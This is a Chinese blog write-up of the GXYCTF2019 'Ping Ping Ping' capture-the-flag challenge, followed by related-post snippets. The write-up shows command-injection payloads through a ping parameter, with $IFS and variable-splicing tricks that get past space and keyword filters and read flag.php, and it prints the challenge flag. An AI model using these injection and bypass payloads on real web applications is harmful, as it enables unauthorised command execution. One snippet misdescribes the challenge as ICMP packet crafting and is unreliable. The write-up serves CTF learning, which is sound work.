[GXYCTF2019]Ping Ping Ping 1

已于 2022-07-24 17:24:02 修改
阅读量2.7k 收藏 11
点赞数 2
文章标签: web
于 2022-07-01 21:13:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43618536/article/details/125563600
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[GXYCTF2019]Ping Ping Ping 1

题目

BUUCTF的[GXYCTF2019]Ping Ping Ping
在这里插入图片描述

一、做题步骤

1.尝试ping 127.0.0.1

?ip=127.0.0.1
在这里插入图片描述

2.尝试查看当前目录下的文件

?ip=127.0.0.1;ls
在这里插入图片描述

3.查看flag.php

1./?ip=127.0.0.1;cat flag.php
提示空格被过滤
在这里插入图片描述

2./?ip=127.0.0.1;cat;flag.php
提示flag被过滤
在这里插入图片描述
3.利用参数替代的方法
?ip=127.0.0.1;b=g;cat$IFS$fla$b.php
查看源代码,得到flag{3b2bf241-e1a1-44ca-a61c-3dda74f04922}
在这里插入图片描述

?ip=127.0.0.1;b=g;tac$IFS$2fla $b.php
flag直接显示在页面上,无需查看代码
tac函数是cat函数的反写
在这里插入图片描述

林本
关注
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1650
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1796
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行,命令1错误则命令2不执行 || 命令1错误命令2执行,命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 689
本题主要阴间在绕过字符和变量的运用细节上。
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
LJW123487的博客
07-25 873
本题涉及知识点:命令执行漏洞,过滤绕过
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5453
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
buuctf-[GXYCTF2019]Ping Ping Ping1
mylovehx的博客
11-26 301
1. 用$IFS绕过空格过滤2. 用赋值的方式绕过关键词过滤127.0.0.1;a=g;3.用反引号绕过关键词过滤127.0.0.1;
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6523
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
【BUUCTF】[GXYCTF2019]Ping Ping Ping 1
manerzi的博客
12-16 338
【BUUCTF】[GXYCTF2019]Ping Ping Ping 1
[GXYCTF2019]Ping Ping Ping 1
最新发布
01-09
针对 GXYCTF2019 中名为 'Ping Ping Ping' 的挑战题,该题目属于网络安全竞赛中的网络层攻击与防御类别。虽然提供的参考资料主要讨论了连续提示上的后门攻击[^1],这与具体 CTF 题目不完全匹配,但可以借鉴其中关于协议分析和异常检测的思想来理解此 CTF 挑战。 对于 'Ping Ping Ping' 这一特定挑战,通常涉及 ICMP 协议的深入理解和应用。ICMP 主要用于在网络设备之间传递控制消息,最著名的例子就是 `ping` 命令所使用的回显请求(Echo Request)和回显应答(Echo Reply)。在实际比赛环境中,选手可能需要利用或绕过防火墙规则、识别隐藏信息或者通过修改 ping 数据包的内容来进行通信。 解决方案一般会围绕以下几个方面展开: ### 1. 抓取并分析流量 为了找到潜在的秘密通道或其他隐蔽的信息传输方式,参赛者可能会使用 Wireshark 或 tcpdump 工具捕获网络数据流,并仔细检查每一个字段,特别是那些看似无害但实际上被用来携带额外负载的部分。 ```bash tcpdump -i any icmp -w pings.pcap ``` 上述命令将会监听所有接口上所有的 ICMP 流量并将它们保存到文件 "pings.pcap" 中以便后续分析。 ### 2. 修改发送的数据包结构 有时解题的关键在于构造特殊的 ICMP 请求报文。例如,在某些情况下,可以通过改变 TTL (Time To Live) 字段或者其他头部选项实现目标主机的不同响应行为;又或者是将秘密信息编码进未受保护的有效载荷部分。 ```python from scapy.all import * def craft_custom_ping(target_ip, payload): packet = IP(dst=target_ip)/ICMP()/Raw(load=payload) send(packet) craft_custom_ping("192.168.1.1", b"hidden message") ``` 这段 Python 代码展示了如何创建一个自定义的 ICMP Echo Request 并向指定的目标地址发送带有特殊有效载荷的消息。 尽管这些方法和技术能够帮助解决问题,但是具体的实施细节取决于主办方设置的具体条件以及所提供的线索。因此建议回顾赛事期间官方给出的相关提示,并尝试重现当时的环境以更好地模拟解答过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值